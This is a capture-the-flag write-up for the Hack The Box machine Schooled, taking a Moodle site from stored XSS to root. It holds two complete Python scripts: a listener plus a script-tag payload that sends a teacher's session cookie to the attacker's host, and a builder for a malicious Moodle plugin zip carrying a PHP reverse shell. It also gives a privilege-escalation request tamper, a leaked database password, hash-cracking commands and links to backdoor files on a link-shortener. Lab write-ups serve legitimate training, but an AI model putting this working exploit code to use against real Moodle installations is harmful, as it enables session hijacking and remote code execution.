Schooled HTB - Write-up
In this post we walk through the Hack The Box machine Schooled, first gaining user access and then root.
The first step, as usual, is an nmap scan for open ports and service versions:
nmap -sC -sV 10.10.10.234
According to the nmap results our target has two open ports, one of them HTTP, so let's check the website running on it.
We don't discover anything interesting on the main site, so let's use ffuf to enumerate virtual hosts (subdomains) by fuzzing the Host header; the -fs 20750 option filters out responses that have the same size as the default page:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750
This reveals a subdomain called "moodle". To reach it we add moodle.schooled.htb to /etc/hosts. Moodle is a free, open-source PHP-based learning management system. Browsing to moodle.schooled.htb, we need to create an account and log in, so let's register one.
We are now signed in, but with the restricted rights of a student, so we need a way to gain privileges. While browsing I came upon an announcement from the site owner that helps (enrol yourself in the Mathematics course).
This announcement is interesting because it mentions the teacher's "MoodleNet" profile field, which is where our XSS payload will be injected. The teacher looks at the profiles of students who sign up for his class (this guy's commitment is amazing), so his browser will execute whatever we put there. We can steal his session cookie and hijack his session.
Now go to your profile and look for the edit option; the MoodleNet profile field is there.
First start an HTTP server on your machine to receive the callback:
python3 -m http.server 8000
The payload I used to catch the teacher's cookie is:
Once the teacher views our profile, his cookie arrives in the HTTP server's log.
Set that cookie in your browser and you are logged in as Manuel Phillips.
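The following is an added example of the cookie-stealing step, not the author's exact payload (which is not reproduced above). It assumes an attacker address of 10.10.14.5 and the port 8000 used above. Instead of watching the raw http.server log, it runs a small listener that parses the stolen cookie out of the callback URL and prints the MoodleSession value; the <script> tag it prints is what goes into the MoodleNet profile field.

```python
"""Cookie-catching listener for the stored XSS in the MoodleNet profile field (added example)."""
import http.server
import urllib.parse

# Attacker-controlled host and port the payload will call back to (assumed values).
ATTACKER_HOST = "10.10.14.5"
ATTACKER_PORT = 8000


def build_payload(host: str, port: int) -> str:
    """Return the <script> tag to place in the MoodleNet profile field.

    The teacher's browser evaluates it when he views our profile and sends
    document.cookie to our listener as the ``c`` query parameter. Only cookies
    without the HttpOnly flag are readable this way; the MoodleSession cookie
    is the one we need.
    """
    return (
        "<script>"
        f"new Image().src='http://{host}:{port}/?c='+encodeURIComponent(document.cookie);"
        "</script>"
    )


def extract_cookies(request_path: str) -> dict:
    """Parse the cookie string out of a request path like ``/?c=MoodleSession%3Dabc``."""
    query = urllib.parse.urlparse(request_path).query
    raw = urllib.parse.parse_qs(query).get("c", [""])[0]
    cookies = {}
    for part in raw.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


class CookieHandler(http.server.BaseHTTPRequestHandler):
    """Log every callback and answer with an empty 200 so the victim's page is unaffected."""

    def do_GET(self):
        cookies = extract_cookies(self.path)
        if "MoodleSession" in cookies:
            print(f"[+] MoodleSession from {self.client_address[0]}: {cookies['MoodleSession']}")
        else:
            print(f"[-] callback without a session cookie: {self.path}")
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        # Silence the default per-request log line; we print what matters ourselves.
        pass


if __name__ == "__main__":
    print("Payload to paste into the MoodleNet profile field:\n")
    print(build_payload(ATTACKER_HOST, ATTACKER_PORT))
    print(f"\nListening on 0.0.0.0:{ATTACKER_PORT} ...")
    http.server.HTTPServer(("0.0.0.0", ATTACKER_PORT), CookieHandler).serve_forever()
```

To hijack the session, open the browser's developer tools on moodle.schooled.htb, replace the value of your own MoodleSession cookie with the captured one and reload the page.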
Our goal from here is to upload a zip file containing a PHP file that gets installed as a plugin and gives us code execution. Installing plugins requires site-administrator rights, though, so we need to climb further. Let's get started with the next steps.
Looking at the course participants we see that Lianne Carter is a Manager. As the teacher, we can enrol users in our course manually; if we intercept that enrolment request in Burp Suite and change the user ID to 24 (Lianne) and the role ID to 1 (manager), we enrol her with the manager role and can then "log in as" her from the participants list, which elevates our privileges.
So enrol Lianne in the course again with the tampered request.
Lianne is now enrolled as a manager, and by logging in as her we effectively become an administrator.
After logging in as Lianne we see the Site administration option.
Go to Users, Define roles, and Edit the manager role, then turn on Burp Suite and capture the request sent when you click Save changes.
In that captured request, delete everything from "&return" onwards and replace the body with the one from the script here, which grants the manager role the capabilities needed to install plugins: gestyy.com/epeLtu
After this, go to Plugins and install a plugin that contains a PHP reverse shell.
Download the rce file from this link: gestyy.com/epeLtu
Extract it and replace its PHP code with your own PHP backdoor, which you can find here: http://gestyy.com/epeLcd
Copy the code from the second file, change the IP address to yours, paste it into the first file, and archive the result as a .zip. Select the "Block" plugin type and upload it. Now listen for the connection with nc -lvnp 1234, visit http://moodle.schooled.htb/moodle/blocks/rce/lang/en and click the uploaded file.
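As an added example (not the files behind the links above), here is a script that builds the malicious block plugin zip from scratch. It assumes the plugin is called rce, matching the path /moodle/blocks/rce/lang/en visited above, and a listener at 10.10.14.5:1234 to match the nc command. Moodle's plugin installer unpacks rce/ into blocks/rce/, so the file placed under lang/en/ ends up at a web-reachable path, and requesting it runs the PHP reverse shell.

```python
"""Build a Moodle block plugin zip whose language file is a PHP reverse shell (added example)."""
import io
import zipfile

# Assumed attacker listener; change to your tun0 address and the nc port.
LHOST = "10.10.14.5"
LPORT = 1234

# Plugin name (assumption): Moodle installs it under blocks/<PLUGIN>/.
PLUGIN = "rce"

# Minimal version.php so Moodle accepts the archive as a valid block plugin.
VERSION_PHP = """<?php
defined('MOODLE_INTERNAL') || die();
$plugin->component = 'block_{name}';
$plugin->version   = 2021010100;
$plugin->requires  = 2018051700;
"""

# Minimal PHP reverse shell: opens a TCP connection to the listener and wires
# a shell's stdin/stdout/stderr to the socket. Needs fsockopen and proc_open,
# which are enabled in a default PHP build.
REVERSE_SHELL_PHP = """<?php
$sock = fsockopen('{host}', {port});
$proc = proc_open('/bin/sh -i', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
"""


def build_plugin_zip(name: str, lhost: str, lport: int) -> bytes:
    """Return the bytes of a zip laid out the way Moodle's plugin installer expects.

    Everything lives under a top-level <name>/ directory. The file under lang/en/
    would normally be a language pack; here it is the shell we request directly.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{name}/version.php", VERSION_PHP.format(name=name))
        zf.writestr(
            f"{name}/lang/en/block_{name}.php",
            REVERSE_SHELL_PHP.format(host=lhost, port=lport),
        )
    return buf.getvalue()


def list_members(zip_bytes: bytes) -> list:
    """Sorted member names, to double-check the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


def read_member(zip_bytes: bytes, member: str) -> bytes:
    """Contents of one member, to verify the listener address was substituted."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(member)


if __name__ == "__main__":
    data = build_plugin_zip(PLUGIN, LHOST, LPORT)
    with open(f"{PLUGIN}.zip", "wb") as fh:
        fh.write(data)
    print(f"wrote {PLUGIN}.zip with members: {list_members(data)}")
    print("after installing it as a Block plugin, trigger the shell with:")
    print(f"  curl http://moodle.schooled.htb/moodle/blocks/{PLUGIN}/lang/en/block_{PLUGIN}.php")
```

Start nc -lvnp 1234 before requesting the file; the PHP request blocks while the shell is connected, so the browser tab will appear to hang, which is expected.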
We now have a shell. Change into /usr/local/www/apache24/data/moodle, where Moodle's config.php lives, and read it with cat config.php. The MySQL credentials are stored in this file, which lets us query the database for password hashes:
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -D moodle -e "select * from mdl_user;"
This gives us the bcrypt hash of the user jamie. Copy it into a file on our local machine and crack it with hashcat (mode 3200 is bcrypt; -a 0 is a straight wordlist attack): hashcat -m 3200 -a 0 hash.txt /wordlist/rockyou.txt
Finally the hash cracks and we have jamie's password.
Now log in over SSH with ssh jamie@schooled.htb.
Let's check what we can do to get root by running sudo -l.
The output shows that jamie is allowed to run the following commands as root via sudo:
/usr/sbin/pkg update
/usr/sbin/pkg install *
Since pkg install runs a package's install scripts as root, a custom package whose post-install script spawns a reverse shell gives us a root shell. cd into /tmp and create a working folder with mkdir payload.
Based on the following article we can create the package: http://gestyy.com/epeL64
Create a file with nano payload.sh and paste the script in (change the IP address to yours).
Make it executable with chmod +x payload.sh and run it; you should see a new package file generated. Then start a listener with
nc -lnvp 8081 and finally install the package: sudo pkg install -y --no-repo-update mypackage-1.0.5.txz (use whatever file name pkg create produced).
And we are root!
I hope you understood everything; if you have any questions, please leave a comment below.